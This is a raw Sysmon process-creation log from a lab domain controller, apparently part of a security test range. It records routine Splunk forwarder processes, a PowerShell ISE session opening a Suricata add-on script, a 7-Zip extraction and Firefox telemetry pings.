AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000018382Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:24.217{A8622C2F-4374-6078-1B05-00000000AE01}5732C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000018373Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:23.545{A8622C2F-4373-6078-1A05-00000000AE01}6100C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000018361Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:22.311{A8622C2F-4372-6078-1905-00000000AE01}3036C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000018350Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:21.624{A8622C2F-4371-6078-1805-00000000AE01}5400C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000018339Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:45:21.123{A8622C2F-4371-6078-1705-00000000AE01}6528C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000018209Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:44:57.525{A8622C2F-4359-6078-1605-00000000AE01}2596C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe10.0.14393.4046 (rs1_release.201028-1803)Windows PowerShell ISEMicrosoft® Windows® Operating SystemMicrosoft Corporationpowershell_ise.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe" "C:\Program Files\SplunkUniversalForwarder\etc\apps\TA-suricata-4\suricata.ps1"C:\Program Files\SplunkUniversalForwarder\etc\apps\TA-suricata-4\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=FEBDA520271B683CD518B3425EC585D4,SHA256=8CFAC3F204DF864A5E9D9E20A4E7D4D70CB30A146661D0F7447A927BE74F7F04,IMPHASH=00000000000000000000000000000000{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000018042Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:44:26.343{A8622C2F-433A-6078-1505-00000000AE01}5672C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000018030Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:44:24.874{A8622C2F-4338-6078-1405-00000000AE01}7116C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000018020Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:44:24.203{A8622C2F-4338-6078-1305-00000000AE01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000018010Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:44:23.531{A8622C2F-4337-6078-1205-00000000AE01}7148C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017995Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:44:22.468{A8622C2F-4336-6078-1105-00000000AE01}6296C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017984Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:44:21.796{A8622C2F-4335-6078-1005-00000000AE01}6392C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000017973Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:44:21.125{A8622C2F-4335-6078-0F05-00000000AE01}6276C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017902Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:43:46.468{A8622C2F-4312-6078-0E05-00000000AE01}6364C:\Program Files\7-Zip\7zG.exe19.007-Zip GUI7-ZipIgor Pavlov7zg.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Program Files\SplunkUniversalForwarder\etc\apps\" -an -ai#7zMap1146:140:7zEvent17959C:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=04FB3AE7F05C8BC333125972BA907398,SHA256=2FB898BACB587F2484C9C4AA6DA2729079D93D1F923A017BB84BEEF87BF74FEF,IMPHASH=9CF6F80DD6DFE9900700C1E11C318B2A{A8622C2F-41CC-6078-CC03-00000000AE01}5260C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 154100x800000000000000017814Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:43:26.313{A8622C2F-42FE-6078-0D05-00000000AE01}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017803Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:43:24.844{A8622C2F-42FC-6078-0C05-00000000AE01}3372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017793Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:43:24.173{A8622C2F-42FC-6078-0B05-00000000AE01}6236C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017783Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
13:43:23.501{A8622C2F-42FB-6078-0A05-00000000AE01}796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017774Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:43:22.438{A8622C2F-42FA-6078-0905-00000000AE01}924C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017756Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:43:21.766{A8622C2F-42F9-6078-0805-00000000AE01}1516C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017745Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:43:21.094{A8622C2F-42F9-6078-0705-00000000AE01}3312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017724Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:43:20.259{A8622C2F-42F8-6078-0605-00000000AE01}6280C:\Windows\System32\InstallAgent.exe10.0.14393.4169 (rs1_release.210107-1130)InstallAgentMicrosoft® Windows® Operating SystemMicrosoft CorporationInstallAgent.exeC:\Windows\System32\InstallAgent.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=88C7DCDD735B31E4F5620E4B9F38C87F,SHA256=5EF1322B96F176C4EA4B8304CAF8B45E2E42C3188AA82ED1FD6196AFC04B7297,IMPHASH=EAB6EF3DE625719627DC808B5F0501FC{A8622C2F-3DED-6078-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 
154100x800000000000000017578Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:42:26.299{A8622C2F-42C2-6078-0405-00000000AE01}3908C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017568Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:42:24.971{A8622C2F-42C0-6078-0305-00000000AE01}6516C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017551Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:42:24.299{A8622C2F-42C0-6078-0205-00000000AE01}2700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017540Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:42:23.486{A8622C2F-42BF-6078-0105-00000000AE01}2328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017526Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:42:22.424{A8622C2F-42BE-6078-0005-00000000AE01}6840C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017516Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
13:42:21.752{A8622C2F-42BD-6078-FF04-00000000AE01}6268C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017506Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:42:21.080{A8622C2F-42BD-6078-FE04-00000000AE01}5400C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-3E7B-6078-AB00-00000000AE01}1340C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000017430Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:49.152{A8622C2F-429D-6078-FC04-00000000AE01}6876C:\Program Files\Mozilla Firefox\pingsender.exe87.0-FirefoxMozilla Foundationpingsender.exe"C:\Program Files\Mozilla Firefox\pingsender.exe" https://incoming.telemetry.mozilla.org/submit/telemetry/5bed5781-10fd-4cd5-9a1f-10a01c5fca2c/first-shutdown/Firefox/87.0/release/20210318103112?v=4 
C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\gtdf58bl.default-release\saved-telemetry-pings\5bed5781-10fd-4cd5-9a1f-10a01c5fca2cC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92MediumMD5=2CA82B57DB86DB7E0E729E8A265BC7AA,SHA256=95770A446509CE22CA41D30DD0EFB3413CD61247358100D72B9BF3F71E1083B2,IMPHASH=AF27FA7223A9B6FE80447A0E6715E632{A8622C2F-428A-6078-EF04-00000000AE01}6992C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000017419Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:49.132{A8622C2F-429D-6078-FA04-00000000AE01}5928C:\Program Files\Mozilla Firefox\pingsender.exe87.0-FirefoxMozilla Foundationpingsender.exe"C:\Program Files\Mozilla Firefox\pingsender.exe" https://incoming.telemetry.mozilla.org/submit/telemetry/9fea91cf-d53b-4c80-8527-2fc1379c73f3/event/Firefox/87.0/release/20210318103112?v=4 C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\gtdf58bl.default-release\saved-telemetry-pings\9fea91cf-d53b-4c80-8527-2fc1379c73f3C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92MediumMD5=2CA82B57DB86DB7E0E729E8A265BC7AA,SHA256=95770A446509CE22CA41D30DD0EFB3413CD61247358100D72B9BF3F71E1083B2,IMPHASH=AF27FA7223A9B6FE80447A0E6715E632{A8622C2F-428A-6078-EF04-00000000AE01}6992C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 154100x800000000000000017407Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:41:49.084{A8622C2F-429D-6078-F804-00000000AE01}6872C:\Program Files\Mozilla Firefox\pingsender.exe87.0-FirefoxMozilla Foundationpingsender.exe"C:\Program Files\Mozilla Firefox\pingsender.exe" https://incoming.telemetry.mozilla.org/submit/telemetry/4031e1f7-1a1b-48f7-88fe-9dc3acd7fc18/new-profile/Firefox/87.0/release/20210318103112?v=4 
